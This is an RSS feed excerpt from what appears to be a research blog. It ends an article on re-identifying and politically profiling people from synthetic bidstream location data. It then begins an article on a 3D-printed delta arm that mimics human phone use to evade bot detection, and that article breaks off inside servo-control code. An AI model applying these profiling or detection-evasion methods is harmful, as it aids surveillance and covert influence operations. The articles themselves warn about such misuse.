&lt;p&gt;This approach effectively converts anonymous geospatial data into actionable intelligence, bridging the gap between digital footprints and real-world identities. While this process does not provide a definitive link between a MAID and a specific individual, it significantly narrows the field of potential owners, making re-identification highly feasible when combined with other datasets.&lt;/p&gt;
&lt;p&gt;Using just the fields in our synthetic data, we can begin to profile individual devices and infer characteristics about their likely owners. While this is a simplified model, it illustrates how even basic bidstream data can reveal sensitive personal attributes, raising concerns about how such data can be exploited when combined with additional sources.&lt;/p&gt;
&lt;p&gt;Some examples of inferences that can be drawn from movement patterns and app interactions include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Occupation &amp;#x26; Income Level&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Work location and commuting patterns can distinguish between blue-collar and white-collar roles.&lt;/li&gt;
&lt;li&gt;The types of retail and leisure locations visited can suggest approximate disposable income (e.g., high-end retailers vs. discount stores).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Health Indicators&lt;/strong&gt;:
-Frequent visits to pharmacies, clinics, or hospitals may indicate chronic health conditions.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Fast food consumption patterns, fitness tracker usage, or presence at gyms could suggest dietary habits and exercise routines.&lt;/li&gt;
&lt;li&gt;Regular visits to e-cigarette shops or tobacco stores could indicate smoking habits.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Age Estimation&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Dating app usage, social media behavior, and visits to nightclubs or youth-centric venues can suggest younger demographics.&lt;/li&gt;
&lt;li&gt;Conversely, regular attendance at locations associated with senior services, medical centers, or quieter suburban amenities may indicate an older demographic.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Religious &amp;#x26; Ethnic Affiliation&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Visits to places of worship (churches, mosques, temples, synagogues) can reveal religious beliefs.&lt;/li&gt;
&lt;li&gt;Certain grocery stores, restaurants, or cultural centers may provide proxies for ethnic background, particularly in areas with strong community ties.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;With even a basic dataset, one can begin to infer political inclinations based on lifestyle, income, and demographic factors. While these are broad statistical generalisations rather than precise classifications, they demonstrate how a more sophisticated analysis could refine these assumptions:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Income Level &amp;#x26; Ideology&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Lower-income households are often more likely to support liberal policies due to their stance on social welfare and taxation.&lt;/li&gt;
&lt;li&gt;Higher-income households may lean conservative based on fiscal priorities and tax incentives.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Age &amp;#x26; Political Views&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Younger individuals tend to lean more progressive, aligning with policies on climate change, social justice, and economic reform.&lt;/li&gt;
&lt;li&gt;Older demographics generally show more conservative voting patterns, particularly on economic and social stability issues.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Occupation &amp;#x26; Ideology&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Blue-collar workers may lean conservative, influenced by economic policies favoring job security and trade protections.&lt;/li&gt;
&lt;li&gt;White-collar professionals, particularly in urban settings, are often more liberal, favoring globalisation, tech policies, and corporate regulations.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;p&gt;&lt;strong&gt;Marital Status &amp;#x26; Political Preference&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Single individuals tend to lean more liberal, aligning with policies on social issues, housing affordability, and worker rights.&lt;/li&gt;
&lt;li&gt;Married couples are more likely to lean conservative, with a focus on economic stability, family policies, and tax benefits.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h2&gt;Political modelling&lt;/h2&gt;
&lt;p&gt;While these estimates are inherently probabilistic, drawing on broad trends in social science and political research, even approximate models of behavior can be pivotal in tightly contested elections with millions of participants. In the UK, where campaign spending is capped, ensuring a high probability that adverts or videos reach the most likely swing voters is essential. With access to greater computational resources and enriched datasets, companies could refine these models to a remarkable degree.&lt;/p&gt;
&lt;p&gt;Building on these assumptions, we can model our fictional dataset to rank devices along a spectrum from most conservative to most liberal. By associating behavioral indicators with ideological tendencies, we can construct a rough ideological map of our simulated population. The ability to identify and target swing voters has been critical in U.S. elections and played a major role in the operations of firms like Cambridge Analytica, whose core offering revolved around identifying and influencing undecided or persuadable voters.&lt;/p&gt;
&lt;p&gt;According to our model, the most conservative device in our dataset belongs to an individual who exhibits a set of behaviors traditionally associated with right-leaning views. This person appears to be an older, presumably married man with a routine that includes regular church attendance and frequent visits to a designated smoking area. His employment at a car garage, combined with spending patterns indicative of a lower income bracket, further aligns with demographic groups often linked to conservative voting tendencies. While our dataset is synthetic and lacks real-world verification, these markers provide a useful proxy for mapping ideological leanings.&lt;/p&gt;
&lt;p&gt;At the opposite end of the spectrum, our most liberal device appears to be associated with a younger female living in a house of multiple occupancy. Her location and movement data suggest employment at a pilates studio, and she regularly engages with both a dating app and a fitness application. These behaviors, coupled with her urban lifestyle and flexible work patterns, align with characteristics often associated with left-leaning political preferences. While individual ideology is far more nuanced than any model can fully capture, the broad trends in our synthetic dataset reflect real-world correlations found in political and social research.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/2e963e7c93a608daee1f19c391454143/6c745/poldevice.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 39.86486486486486%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAIAAAB2/0i6AAAACXBIWXMAABJ0AAASdAHeZh94AAABm0lEQVQY0x2P2XKiQAAA/f+f2dJordaCLjcMMwwzwxEuCWg4xGGVGONmS43Zl37r6urR7XY7/OEbvqm6Zl/Vr11Ztdu23pZZGGVxtA5QAtMy716SusiaXd33vG12TVu9vR9H9/u9qV9hjG2gUgjtECGim5ZiLufhswrTmcymji0QbSKLT8SBXmA7geGFpOmL0fV6ravCoSjQVYR1zDALAM19BAyPyhBMHWNJMiXe+O4aUh8CsICuRjxU1i+jYTjVTRHQR3aBEo3FhFCYQImIE0t4Qq5MqCAWK6syWk6iNfMYAL4q0p9ZHY/ehuGxSJFqxystUhG0bFMMHJk5oqb8IpaCmeT6FsrsqDWzCq9zi5aKWo7TOvn/vN2g8Q/iCLY+gcIMQQkz3c2wZilQWq4QYJ5rGupvtJLYPC8dNzNUpKVZ/i1vy8KYL0xDkNWZ52MQUsRM2ZRkW4dISHw9SF2XYIiBjQ1DmgJnLIBxkoff8uXyt9vvh+PQtt3pfOY9P51PD/K+j5OEd3zP+8vH5XB48IN3u/fzwI+7z3+fX/nAktQerGcaAAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;poldevice&quot;
        title=&quot;poldevice&quot;
        src=&quot;/static/2e963e7c93a608daee1f19c391454143/fcda8/poldevice.png&quot;
        srcset=&quot;/static/2e963e7c93a608daee1f19c391454143/12f09/poldevice.png 148w,
/static/2e963e7c93a608daee1f19c391454143/e4a3f/poldevice.png 295w,
/static/2e963e7c93a608daee1f19c391454143/fcda8/poldevice.png 590w,
/static/2e963e7c93a608daee1f19c391454143/efc66/poldevice.png 885w,
/static/2e963e7c93a608daee1f19c391454143/6c745/poldevice.png 893w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;Focusing on the middle 10% of our ideological spectrum, we can identify a subset of devices representing potential swing voters. By mapping their home locations, we can visualise geographic clusters where political persuasion is more fluid. In a real-world scenario, these areas would be of particular interest to political campaigns, as small shifts in voter sentiment within these regions could be decisive in a closely contested election. The ability to target advertising and messaging to these individuals with high precision underscores why even probabilistic models of behavior hold significant strategic value.&lt;/p&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 590px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/0ef5c9a9927f427d8f1a25f5b532ae1e/37523/swingvoters.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 102.02702702702702%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAUCAIAAAAC64paAAAACXBIWXMAABJ0AAASdAHeZh94AAAD20lEQVQ4yz2TW2/jRBTH96vxwOOKByReeeUm7QcACYGQgAW0L7yAEGhBLVtaetuktyQNiXOzPbbH97FnxuOxYztJL0nTTUrbbbymG3Y0N4300/+cM//zYLFYjCdTHxtYOFSw7LhH3Gs5oYgd0Q4MwtCxUYWOhHBXJ6LMn7fZmmDt+NTM8/xBAS/yvM8DbPVE2ug4+5g0TE9owEPD1wyiHBol1wauJxmo3nOeieRPKVy1406+uIfPx+OAYj9S1aQBfJGaIDZNDe81SOXYqYpumbImCUw9Fsx0H4Y7IN3Q09Z/cH4/zrIR8kWBH0CmIUWLOxoPkBLJuiMTrCmDMhyUNL5vJXX39EgInxlJdxn2+dl5GHM7kMruFvAkT6qz2o6raMRRoNmzuOpnPT07lPimGBVza9v6w4jF18pFyvloEMjeAdAPbVjDpoB9kSDdc0DH3LNjMUwwzCog2e2F2y2yW7JWnFB4k/MkChDpVonaBrzpcstOdCdS40jXjLbvIxRAxFQl2JNITaRyxfkdJ8175cXiLs8HAQmQTLHcov/s0YPoREtHapwQRGWAhY5fKfZWJoB+E3PRYmWciUvlyWTKfCPGwMMyJorHbTuV7H4rTA0WdpWs0eZbVfi8u/6T6lZ8v0f6IhnAZc53d4soIgFsQiJS7sXUJAw0zLJNhTBVvOba6P33kkcfpN9+1UNt3QddVnIH3aXy1XxOONPMJrXbNHZJREKKvEDkgeLhmmv+xZ98On348PTrz7T2uhIe99ghehN2AfMs1g3FtZV+4MScJWkwOsGcE8h2W+MDKK/N3n5r+u47/m8/dJzyMdvwEvkeLir2chEMQsNuawgCvzkM1LTv9EeURwAPa/xUBqxk66tnjz4kP39ZF36tJxteKv9fsItpHGLX1zWiS1bHNCG1ZT+SWWjjkUBGgjo6kMNtb+WJBNbb2krVWXGHcn73+qsW+SD2PCQTYsaEo4CoBhDFioqa7XhLTktitqOmVXlS1YdHgOypTx8bSFjac3JxERPUMitddkSjbhxZPMQEqo5cs+xNNd03e6vBL99DXtJOqsd0U/Q2DHTv7aU9s5BF2BwALaxlWWGqeqo3MmKGvqpFR97qN8OPP+n/+J0G1qVBucvLkIKl8ng8LjrSpaqe7YO4FBOV4cLPXjakyQiTyNqSnsIvPgoff242/4akBZWai7QlXBxplgFVdDCEUPJd00E2Cr0oYoS5g6SvuLLeV1Uq+8yASoNgj1E6m82W/fzy9nY6vby5vp1eXF5dXU2n0/ls/mI2e1Gs+bx4vP73Zjq5vL6+mRT3m5si2AJ+BUHO8MTjTi+5AAAAAElFTkSuQmCC&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;swingvoters&quot;
        title=&quot;swingvoters&quot;
        src=&quot;/static/0ef5c9a9927f427d8f1a25f5b532ae1e/fcda8/swingvoters.png&quot;
        srcset=&quot;/static/0ef5c9a9927f427d8f1a25f5b532ae1e/12f09/swingvoters.png 148w,
/static/0ef5c9a9927f427d8f1a25f5b532ae1e/e4a3f/swingvoters.png 295w,
/static/0ef5c9a9927f427d8f1a25f5b532ae1e/fcda8/swingvoters.png 590w,
/static/0ef5c9a9927f427d8f1a25f5b532ae1e/37523/swingvoters.png 720w&quot;
        sizes=&quot;(max-width: 590px) 100vw, 590px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;h2&gt;Conclusion&lt;/h2&gt;
&lt;p&gt;The analysis presented here, while based on a synthetic dataset, demonstrates just how revealing bidstream and MAID data can be when aggregated and analysed at scale. Even with a basic probabilistic model, we can infer broad ideological leanings, identify swing voters, and simulate how political campaigns, intelligence agencies, or commercial entities might exploit such data for targeted influence. When applied to real-world datasets, where enriched personal information is often available, the potential for invasive tracking and manipulation becomes even more alarming.&lt;/p&gt;
&lt;p&gt;The UK’s regulatory framework, particularly GDPR, places legal obstacles in the way of widespread bidstream exploitation. However, legal restrictions do not always deter those with the resources and intent to operate in legal grey areas. The sheer volume of location data circulating in the advertising ecosystem makes it highly susceptible to misuse, whether by political operatives seeking to influence election outcomes, private intelligence firms conducting mass surveillance, or malicious actors engaging in coercion and profiling.&lt;/p&gt;
&lt;p&gt;This article has aimed to provide a practical look at how seemingly harmless individual bidstream events can be transformed into a powerful surveillance tool. As regulatory scrutiny lags behind the rapid evolution of ad-tech and data brokerage, the implications for privacy, democracy, and civil liberties remain profound.&lt;/p&gt;
&lt;p&gt;If nothing else, this should serve as a stark reminder: when you see an ad pop up on your phone, you may not just be a potential customer, you may also be a data point in a far larger, more intricate system of influence and surveillance.&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Calibrating a 3D Printed Delta Arm for Screen Interaction]]></title><description><![CDATA[Introduction The battle between disinformation spreaders, propagandists, and automated social media activity, and the algorithms designed to…]]></description><link>https://dfworks.com/blog/delta_arm/</link><guid isPermaLink="false">https://dfworks.com/blog/delta_arm/</guid><pubDate>Thu, 24 Oct 2024 12:00:00 GMT</pubDate><content:encoded>&lt;h2&gt;Introduction&lt;/h2&gt;
&lt;p&gt;The battle between disinformation spreaders, propagandists, and automated social media activity, and the algorithms designed to detect and control them, is an ongoing arms race. While many expect it should be easy to distinguish human behaviour from bots, the reality is much more complex and challenging.&lt;/p&gt;
&lt;p&gt;Through my research on forums like BlackHatWorld, I gained insight into how bot farmers and trolls evade detection. Techniques such as &lt;a href=&quot;https://www.blackhatworld.com/seo/does-anyone-have-an-undetectable-selenium-jar.962732/&quot;&gt;hex editing chromedriver&lt;/a&gt; to alter browser fingerprints and using &lt;a href=&quot;https://www.youtube.com/watch?v=X_pRsSM_sXQ&quot;&gt;device farms&lt;/a&gt; for physical and virtual automation at scale illustrate some tactics taken to influence at scale while avoiding detection. These findings led me to explore whether emulating human behaviour with robotics could offer an alternative and cost-effective solution for device automation at scale.&lt;/p&gt;
&lt;p&gt;This article details my effort to convincingly and affordably emulate human like operation of a device, rather than just simulating application-level activity. Hiring real humans for such tasks is  almost certainly prohibitively expensive (unless you’re &lt;a href=&quot;https://journals.sagepub.com/doi/full/10.1177/20563051231224713&quot;&gt;Saudi Arabia&lt;/a&gt;), so affordable orchestration of human-like activity could facilitate large-scale influence operations or the countering of disinformation without the financial strain of hiring content creators.&lt;/p&gt;
&lt;h2&gt;The Tapsterbot: Components and Setup&lt;/h2&gt;
&lt;p&gt;&lt;a href=&quot;https://github.com/tapsterbot/tapsterbot&quot;&gt;Tapsterbot&lt;/a&gt; is a 3D printable delta arm developed by Jason Huggins, the creator of Selenium. I understand that his current venture, &lt;a href=&quot;http://Tapster.io&quot;&gt;Tapster.io&lt;/a&gt;, is a robotics company working on more sophisticated delta arms and other forms of human-like manipulation for app testing which is definitely worth checking out!&lt;/p&gt;
&lt;p&gt;The &lt;a href=&quot;https://github.com/tapsterbot/tapsterbot&quot;&gt;Tapsterbot&lt;/a&gt; project’s GitHub page provides the 3D printing files and a Bill of Materials (BOM) needed to build a delta arm for approximately £70 (assuming you have a printer), along with the software required to control it.&lt;/p&gt;
&lt;p&gt;I won’t go into too much detail as I’ll be repeating what is available on Github but here are some extra resources I relied on to build the delta arm. &lt;a href=&quot;https://bitbeam.org/tag/tapsterbot/&quot;&gt;1&lt;/a&gt; &lt;a href=&quot;https://www.instructables.com/Tapsterbot-20-Arm-Assembly/&quot;&gt;2&lt;/a&gt; &lt;a href=&quot;https://www.youtube.com/channel/UCIPouO52Yc5aeYZzntVZFJA&quot;&gt;3&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;The key components of the Tapsterbot include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Motors&lt;/strong&gt;: Three Hitec HS-311 servo motors, combined with some advanced trigonometric and kinematic mathematics that I don’t fully grasp, allow the delta arm to move effortlessly through three-dimensional space.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Arduino Microcontroller&lt;/strong&gt;: The Arduino controls the motors based on input commands, translating them into physical movements of the delta arm.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;3D Printed Delta Arm&lt;/strong&gt;: The core structure of the Tapsterbot consists of a top plate suspended above a bottom plate, with an arm made of rods and magnets. A stylus is then inserted into the delta arm ‘hand’.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;&lt;span
      class=&quot;gatsby-resp-image-wrapper&quot;
      style=&quot;position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 405px; margin: 0 0 30px;&quot;
    &gt;
      &lt;a
    class=&quot;gatsby-resp-image-link&quot;
    href=&quot;/static/e5c7810986d3e49a7b45052f5cc005b5/1d180/delta_arm.png&quot;
    style=&quot;display: block&quot;
    target=&quot;_blank&quot;
    rel=&quot;noopener&quot;
  &gt;
    &lt;span
    class=&quot;gatsby-resp-image-background-image&quot;
    style=&quot;padding-bottom: 150%; position: relative; bottom: 0; left: 0; background-image: url(&apos;data:image/png;base64,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&apos;); background-size: cover; display: block;&quot;
  &gt;&lt;/span&gt;
  &lt;img
        class=&quot;gatsby-resp-image-image&quot;
        alt=&quot;Delta Arm&quot;
        title=&quot;Delta Arm&quot;
        src=&quot;/static/e5c7810986d3e49a7b45052f5cc005b5/1d180/delta_arm.png&quot;
        srcset=&quot;/static/e5c7810986d3e49a7b45052f5cc005b5/12f09/delta_arm.png 148w,
/static/e5c7810986d3e49a7b45052f5cc005b5/e4a3f/delta_arm.png 295w,
/static/e5c7810986d3e49a7b45052f5cc005b5/1d180/delta_arm.png 405w&quot;
        sizes=&quot;(max-width: 405px) 100vw, 405px&quot;
        style=&quot;width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;&quot;
        loading=&quot;lazy&quot;
      /&gt;
  &lt;/a&gt;
    &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;To control the Tapsterbot’s delta arm, commands must be sent to the Arduino, which then translates them into motor movements. This is done using a Node.js server, the main ‘go’  function in the server takes in a user supplied set of coordinates entered in the terminal, handles the complicated maths and then moves the servos.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;javascript&quot;&gt;&lt;pre class=&quot;language-javascript&quot;&gt;&lt;code class=&quot;language-javascript&quot;&gt;&lt;span class=&quot;token function-variable function&quot;&gt;go&lt;/span&gt; &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;function&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token parameter&quot;&gt;x&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; z&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; easeType&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; pointB &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;x&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; y&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; z&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
  
  &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;easeType &lt;span class=&quot;token operator&quot;&gt;==&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;none&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token function&quot;&gt;moveServosTo&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;pointB&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;0&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; pointB&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;1&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; pointB&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token number&quot;&gt;2&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;
    &lt;span class=&quot;token keyword&quot;&gt;return&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// Ensures that it doesn&apos;t move twice&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;else&lt;/span&gt; &lt;span class=&quot;token keyword&quot;&gt;if&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token operator&quot;&gt;!&lt;/span&gt;easeType&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    easeType &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; defaultEaseType&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt; &lt;span class=&quot;token comment&quot;&gt;// If no easeType is specified, go with default (specified in config.js)&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;}&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;// motion.move(current, pointB, steps, easeType, delay);&lt;/span&gt;
  &lt;span class=&quot;token keyword&quot;&gt;var&lt;/span&gt; points &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; motion&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token function&quot;&gt;getPoints&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;current&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; pointB&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; steps&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; easeType&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;;&lt;/span&gt;

